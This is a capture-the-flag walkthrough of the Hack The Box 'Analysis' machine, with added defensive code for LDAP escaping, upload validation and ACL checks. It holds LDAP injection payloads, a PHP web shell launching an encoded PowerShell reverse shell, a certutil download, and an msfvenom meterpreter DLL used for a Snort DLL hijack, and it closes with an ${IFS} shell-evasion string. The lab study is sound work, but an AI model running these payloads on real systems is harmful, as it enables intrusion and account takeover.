🔎ANALYSIS
Welcome to the formidable challenge of the "Analysis" box on Hack The Box (HTB), a hard-level Windows-based puzzle in this Open Beta 4 edition.

Hacking Phases for Analysis HTB:
Information Gathering
Enumerate web services
Analyse web vulnerabilities
Gain a web shell
Lateral movement
PrivEsc
I => Information Gathering
Initial Reconnaissance
Begin with a comprehensive nmap scan to identify active ports and services on the "Analysis" box.
Command:
nmap -sC -sV -O -T4 --min-rate=500 -oA nmap/analysis 10.10.11.250
Result Snapshot:
Host Response: 10.10.11.250 is up (Latency: 0.26s).
Majority of TCP Ports: Closed.
Open Ports and Services:
53/tcp: Domain (Simple DNS Plus)
80/tcp: HTTP (Microsoft HTTPAPI httpd 2.0)
88/tcp: Kerberos Security (Microsoft Windows Kerberos)
135/tcp: Microsoft Windows RPC
139/tcp: NetBIOS Session (Microsoft Windows netbios-ssn)
389/tcp: LDAP (Microsoft Windows Active Directory LDAP)
445/tcp: Microsoft Directory Services
464/tcp: kpasswd5
593/tcp: Microsoft Windows RPC over HTTP
636/tcp, 3269/tcp: tcpwrapped
3268/tcp: LDAP (Microsoft Windows Active Directory LDAP)
3306/tcp: MySQL (unauthorized)
OS Detection: Inconclusive (Potential Windows OS)
Host Script Results:
SMB2 Protocol Negotiation Failed
Analysis: The scan reveals a typical Windows domain environment with services like Kerberos, LDAP, and Microsoft RPC. The unusual presence of a MySQL server and failed SMB2 negotiation suggest potential avenues for exploration.
Next Steps:
DNS Mapping: Add analysis.htb to /etc/hosts.
Web Application Assessment: Explore the web application on port 80 for vulnerabilities.
Service Exploration: Investigate LDAP, Kerberos, and SMB services.
II => HTTP Enumeration && Exploitation
Objective: Uncover web applications for initial access or crucial information.
After reviewing http://analysis.htb/, which appears to be static, I started digging for any leads to begin my exploration.

Tools & Techniques:
DNS Enumeration: Utilizing tools like dnsenum, gobuster, and custom bash scripts.
Commands Used:
dnsenum: Enumerates DNS details.
dnsenum --dnsserver 10.10.11.250 --enum -p 0 -s 0 -o out.txt -f wordlist.txt analysis.htb
Gobuster: Brute-forces DNS subdomains.
gobuster dns -d analysis.htb -w wordlist.txt -r 10.10.11.250
Bash Script: Queries for subdomains.
for sub in $(cat wordlist.txt); do
  # Ask the box's own DNS server for each candidate name, drop dig's comment and SOA lines, and keep only answers
  dig "$sub.analysis.htb" @10.10.11.250 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep "$sub" | tee -a out.txt
done
Outcome & Analysis:
The goal is to discover subdomains associated with additional services or web applications.
Next Steps:
Investigate discovered subdomains.
Note internal.analysis.htb for further exploration.
It seems the main page just returns 403, and any directory we try returns 404. Use dirsearch to scan internal.analysis.htb for hidden directories and PHP files.
Visual Insight:
As we can see, we didn't find anything.
Uncovering Hidden Gems
dirsearch -q -r -u http://internal.analysis.htb/ -i 200,300-399 -e php
Findings: Discovered several directories and files including login and user list endpoints.
After extensive searching, focus shifted to LDAP injection because of the Active Directory services seen in the nmap results.
Visual Evidence:

Parameters Fuzzing:
Found the name parameter with ffuf:
ffuf -c -v -w parameters.txt -u "http://internal.analysis.htb/users/list.php?FUZZ=test"
I discovered that name is vulnerable to LDAP injection.
Uncovering LDAP Injection
Parameter Identification:
While exploring http://internal.analysis.htb/users/list.php, the name parameter was identified, and a critical observation was that it is susceptible to LDAP injection.
Exploiting LDAP Injection:
A series of fuzzing passes were run against the name parameter. They revealed two significant LDAP attributes, objectClass and description. The successful LDAP query structure was identified as:
url?name=*)(%26(FUZZING=*)
url?name=*)(%26(objectClass=*)(FUZZING=*)
url?name=*)(%26(objectClass=*)(description=*)
# I think the full query looks like this
(&(name=*)(objectClass=*)(description=*))
Intriguingly, the objectClass attribute consistently held the value user, and the description attribute contained a lengthy string, interpreted as the password for the technician user.
To further exploit this discovery, a specialized script was utilized, significantly enhanced and optimized for this specific scenario. This custom script, available on Hunt3r0x's GitHub, was pivotal in extracting the complete password.
Script Usage:
python3 fuzzer.py --charset allchars-wordlist.txt
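The following is an added example, not code from the write-up or from the box's application: it shows why an unescaped name parameter lets the client rewrite the server's LDAP filter, and how RFC 4515 escaping stops it. The filter template FILTER_TEMPLATE, the SAMPLE_ENTRY directory record and its placeholder description value are all assumptions constructed for this demo (nothing here is the box's real data). A small filter evaluator is included so the unsafe and escaped filters can actually be run against the sample entry.

```python
# Added example, not code from the original write-up: how a raw "name" parameter
# rewrites the LDAP filter, and how RFC 4515 escaping stops it. The filter
# template, the payload shape and the sample entry are assumptions for this demo.

FILTER_TEMPLATE = "(&(objectClass=user)(name={value}))"   # assumed shape of the app's query

# Constructed directory entry: attribute names lower-cased, values as lists like LDAP.
SAMPLE_ENTRY = {
    "objectclass": ["user"],
    "name": ["technician"],
    "description": ["CONSTRUCTED-SAMPLE-SECRET"],
}

# RFC 4515 section 3: characters that must be hex-escaped inside an assertion value.
_LDAP_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def escape_ldap_filter_value(value: str) -> str:
    """Escape user input so it can only ever be a literal assertion value."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(name: str) -> str:
    """Vulnerable pattern: raw interpolation, so '(' and ')' restructure the filter."""
    return FILTER_TEMPLATE.format(value=name)


def build_filter_safe(name: str) -> str:
    """Hardened pattern: same template, value escaped first (wildcards disabled too)."""
    return FILTER_TEMPLATE.format(value=escape_ldap_filter_value(name))


def _unescape(raw: str) -> str:
    """Turn RFC 4515 hex escapes such as \\2a back into characters."""
    out, i = [], 0
    while i < len(raw):
        if raw[i] == "\\" and i + 3 <= len(raw):
            out.append(chr(int(raw[i + 1:i + 3], 16)))
            i += 3
        else:
            out.append(raw[i])
            i += 1
    return "".join(out)


def _parse(s: str, i: int):
    """Recursive-descent parser for and / or / not / equality / substring filters."""
    if i >= len(s) or s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    if i >= len(s):
        raise ValueError("truncated filter")
    if s[i] in "&|":
        op, subs, i = s[i], [], i + 1
        while i < len(s) and s[i] == "(":
            child, i = _parse(s, i)
            subs.append(child)
        node = (op, subs)
    elif s[i] == "!":
        child, i = _parse(s, i + 1)
        node = ("!", child)
    else:
        eq = s.index("=", i)
        close = s.index(")", eq)    # an escaped ')' is '\29', so this is the real close
        node = ("=", s[i:eq].lower(), s[eq + 1:close])
        i = close
    if i >= len(s) or s[i] != ")":
        raise ValueError(f"expected ')' at offset {i}")
    return node, i + 1


def _match_value(pattern: str, actual: str) -> bool:
    """Equality, presence ('*') or substring match, case-insensitive like AD."""
    parts = [_unescape(p).lower() for p in pattern.split("*")]  # only real wildcards are bare '*'
    a = actual.lower()
    if len(parts) == 1:
        return a == parts[0]
    if not a.startswith(parts[0]) or not a.endswith(parts[-1]):
        return False
    pos = len(parts[0])
    for mid in parts[1:-1]:
        idx = a.find(mid, pos)
        if idx < 0:
            return False
        pos = idx + len(mid)
    return pos <= len(a) - len(parts[-1])


def _evaluate(node, entry: dict) -> bool:
    kind = node[0]
    if kind == "&":
        return all(_evaluate(n, entry) for n in node[1])
    if kind == "|":
        return any(_evaluate(n, entry) for n in node[1])
    if kind == "!":
        return not _evaluate(node[1], entry)
    _, attr, pattern = node
    return any(_match_value(pattern, v) for v in entry.get(attr, []))


def matches(ldap_filter: str, entry: dict) -> bool:
    """True if the entry satisfies the filter; ValueError on a malformed filter."""
    node, end = _parse(ldap_filter, 0)
    if end != len(ldap_filter):
        raise ValueError("trailing data after filter")
    return _evaluate(node, entry)


if __name__ == "__main__":
    payload = "*)(&(objectClass=*)(description=*)"   # the write-up's payload, URL-decoded
    for build in (build_filter_unsafe, build_filter_safe):
        f = build(payload)
        print(f"{build.__name__}: {f} -> matches={matches(f, SAMPLE_ENTRY)}")
```

With raw interpolation the payload's leading `*)` closes the name item and its `(&(...)(...)` borrows the template's trailing parenthesis, so the filter stays syntactically valid and now asks about description for every user; after escaping, the same bytes are just a literal name that matches nothing. Note that escaping also turns `*` into `\2a`, so if the page legitimately needs wildcard search that has to be added back deliberately rather than passed through from the client.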

When I have credentials in a Windows environment, I start by checking their validity against the most common protocols.
User Enumeration:
Employed kerbrute for user enumeration with the discovered credentials.
# Append the domain suffix to every user in users.txt
sed -i "s|$|@analysis.htb|" users.txt
# Then
kerbrute userenum -d analysis.htb users.txt --dc analysis.htb
Found several users, including technician.
Kerbrute Output:

Protocols Enumeration:
Used crackmapexec to enumerate protocols with technician's credentials.
crackmapexec <PROTOCOL> 10.10.11.250 -u 'technician' -p 'password'
for protocol in mssql smb ldap ftp winrm ssh rdp; do crackmapexec $protocol 10.10.11.250 -u 'technician' -p 'password'; done
Nothing was found.
Web Login:
Successfully logged in with the discovered credentials at http://internal.analysis.htb/employees/login.php.
Exploiting File Upload
Found and exploited a file upload function in the admin panel.
Uploading test PHP code:
<?php echo "<h1>HELLO \;</h1>"; ?>

It worked:

Gaining a reverse shell
Upload this, but make sure you put in your own PowerShell script (https://www.revshells.com/ can generate one):
<?php system("powershell -e <PS script encoded with BASE64>"); ?>
Then start your netcat listener and visit the uploaded shell.
netcat
rlwrap -cAr nc -lvnp <PORT>
Gained a reverse shell as svc_web. The user flag was owned by the jdoe user.
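As an added example (not part of the write-up and not the box's application code), here is the server-side validation that would have rejected the PHP uploads above. The policy it enforces is an assumption made for the example: only PNG/JPEG images, judged by the final extension and by magic bytes, stored under a random name in a directory (UPLOAD_DIR, assumed) that the web server never executes or serves directly. The sample file contents in the usage are constructed.

```python
# Added example, not code from the original write-up: server-side checks that
# would have rejected the PHP upload described above. The policy (images only,
# random name, storage outside the web root) is an assumption for this example.
import os
import secrets

# Allowed extensions mapped to the magic bytes the content must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
MAX_BYTES = 2 * 1024 * 1024
UPLOAD_DIR = "/srv/uploads"   # assumed: a directory the web server never executes or serves directly


def check_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason); every rejection names the control that fired."""
    base = os.path.basename(filename)
    if base != filename or ".." in base or "\x00" in base or "\\" in base:
        return False, "path traversal or control character in name"
    if len(content) > MAX_BYTES:
        return False, "too large"
    # Only the final extension decides the type; "shell.php.png" is judged as png,
    # which is why the magic-byte check and non-executable storage still matter.
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        return False, f"extension '{ext}' not in allow-list"
    if not content.startswith(magic):
        return False, "content does not match declared type"
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded PHP tag"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Never reuse the client's name: a random token also defeats path guessing."""
    return f"{secrets.token_hex(16)}.{ext}"


def save_upload(filename: str, content: bytes, directory: str = UPLOAD_DIR) -> str:
    """Validate, then write under a random name; returns the stored path."""
    ok, reason = check_upload(filename, content)
    if not ok:
        raise ValueError(reason)
    ext = filename.rsplit(".", 1)[-1].lower()
    os.makedirs(directory, exist_ok=True)
    path = os.path.join(directory, stored_name(ext))
    with open(path, "wb") as fh:
        fh.write(content)
    return path


if __name__ == "__main__":
    # Constructed inputs: the write-up's test page, a double-extension attempt, a real PNG header.
    samples = [
        ("hello.php", b'<?php echo "<h1>HELLO</h1>"; ?>'),
        ("shell.php.png", b'<?php system("whoami"); ?>'),
        ("avatar.png", b"\x89PNG\r\n\x1a\n" + bytes(32)),
    ]
    for name, data in samples:
        print(name, "->", check_upload(name, data))
```

The extension allow-list alone is not enough: a web server configured to run `.phtml` or `.phar`, or an Apache AddHandler that matches any `.php.` in the name, would still execute a "picture" that is really PHP, so the magic-byte check and a non-executable upload directory are the controls that hold when the others are misconfigured.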

III => Privilege Escalation
Objective: To escalate privileges and gain higher-level access on the system.
Techniques & Tools:
Initial Lateral Movement:
Initially gained shell access as svc_web. The user flag was under jdoe's ownership.
PowerShell Script for Privilege Escalation:
Utilized the PrivescCheck PowerShell script. Upload the script to the machine:
# First
## In your terminal
wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1
## And then open an HTTP server
python3 -m http.server <PORT>
# Second
## In the gained shell
certutil -urlcache -f http://<TUN0>:<PORT>/PrivescCheck.ps1 PrivescCheck.ps1
Executed the script with:
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format HTML"
Discovered leaked credentials for jdoe in the Winlogon registry key.

Credential Validation with CrackMapExec:
Validated the discovered credentials using CrackMapExec.
crackmapexec <PROTOCOL> 10.10.11.250 -u 'user' -p 'password'
for protocol in mssql smb ldap ftp winrm ssh rdp; do crackmapexec $protocol 10.10.11.250 -u 'user' -p 'password'; done
Confirmed the credentials' validity over the WinRM protocol.

Accessing jdoe's Account with Evil-WinRM:
Gained access to the jdoe account using Evil-WinRM:
evil-winrm -i 10.10.11.250 -u "jdoe" -p "password"
Successfully retrieved the user flag.

I'm really a noob at Windows PrivEsc, so after a long day of mess and tips from the cyber community I got this:
Exploiting CVE-2016-1417 for Administrator Access:
Identified the machine's vulnerability to CVE-2016-1417 (DLL hijacking in Snort 2.9.7.0-WIN32).
Created a DLL payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=1337 -f dll > tcapi.dll
Set up a listener in Metasploit:
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost TUN0
set lport 1337
run
Uploaded tcapi.dll to C:\snort\lib\snort_dynamicpreprocessor using jdoe's shell in Evil-WinRM:
upload tcapi.dll tcapi.dll # In Evil-WinRM
## If you get an access error, try removing the existing .dll files first
del *.dll
## Then
upload tcapi.dll tcapi.dll
We're in!

Successfully executed the DLL payload, exploiting the vulnerability.
Gained a Meterpreter shell with administrative access through DLL hijacking.
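The hijack above only works because a low-privileged account can drop a DLL into a directory that a privileged Snort process loads from. As an added example (not from the write-up), here is a defender's check for exactly that precondition: it parses the text that `icacls <dir>` prints and flags directories where Everyone, BUILTIN\Users or Authenticated Users hold a right that lets them create or replace files. The SAMPLE_ICACLS listing is constructed for the example, not captured from the box, and the group and rights tables are assumptions you would tune to your environment.

```python
# Added example, not code from the original write-up: a defender's check for the
# precondition behind the Snort DLL hijack, a directory on a service's DLL search
# path that a low-privileged principal can write to. It parses icacls output; the
# listing below is constructed for this example, not captured from the box.
import re

# Groups an ordinary domain user belongs to (compared case-insensitively).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# icacls rights that allow creating or replacing files in a directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}

# Constructed icacls listing: each path line carries its first ACE, further ACEs
# are indented beneath it. Paths and ACEs are illustrative.
SAMPLE_ICACLS = r"""C:\snort\lib\snort_dynamicpreprocessor NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                         BUILTIN\Administrators:(OI)(CI)(F)
                                         BUILTIN\Users:(OI)(CI)(M)
C:\Program Files\Vendor\bin NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                            BUILTIN\Administrators:(OI)(CI)(F)
                            BUILTIN\Users:(OI)(CI)(RX)
C:\Tools\plugins Everyone:(OI)(CI)(RX,W)
                 BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 3 files; Failed processing 0 files
"""

# "<head>:(flag)(flag)..." where head is "path principal" on a path line, else just the principal.
ACE_RE = re.compile(r"^(?P<head>.+?):(?P<rights>(?:\([^)]*\))+)\s*$")
# Principal forms at the end of a path line; the generic DOMAIN\name form must be space-free
# so that a path fragment such as "lib Everyone" is never mistaken for a principal.
PRINCIPAL_RE = re.compile(
    r"((?:NT AUTHORITY|NT SERVICE|BUILTIN)\\[^\\:]+|Everyone|S-1-[0-9-]+|[^\s\\]+\\[^\s\\:]+)$"
)


def parse_icacls(text: str) -> list:
    """Return a list of (path, principal, rights-set) for every ACE in the output."""
    entries, path = [], None
    for line in text.splitlines():
        m = ACE_RE.match(line.rstrip())
        if not m:
            continue                      # blank line or the summary line
        head, rights = m.group("head"), m.group("rights")
        if not line.startswith(" "):
            pm = PRINCIPAL_RE.search(head)
            if not pm:
                continue
            path, principal = head[:pm.start()].rstrip(), pm.group(1)
        else:
            principal = head.strip()
        # "(OI)(CI)(RX,W)" -> {"OI", "CI", "RX", "W"}
        tokens = {t for grp in re.findall(r"\(([^)]*)\)", rights) for t in grp.split(",")}
        entries.append((path, principal, tokens))
    return entries


def writable_by_low_priv(text: str) -> dict:
    """Map each directory to the low-privileged principals that can write into it."""
    findings = {}
    for path, principal, rights in parse_icacls(text):
        if principal.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            findings.setdefault(path, []).append(principal)
    return findings


if __name__ == "__main__":
    for path, who in writable_by_low_priv(SAMPLE_ICACLS).items():
        print(f"{path}: writable by {', '.join(who)}")
```

Run it over `icacls` output for every directory a service or scheduled task loads DLLs from (its install directory, the folders on its PATH, and plugin directories like the Snort one); any hit means a standard user can plant code that runs with the service's token, and the fix is to grant write access there to administrators only.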
ANOTHER${IFS}SHITY${IFS}THING<<<SEE${IFS}YOU/: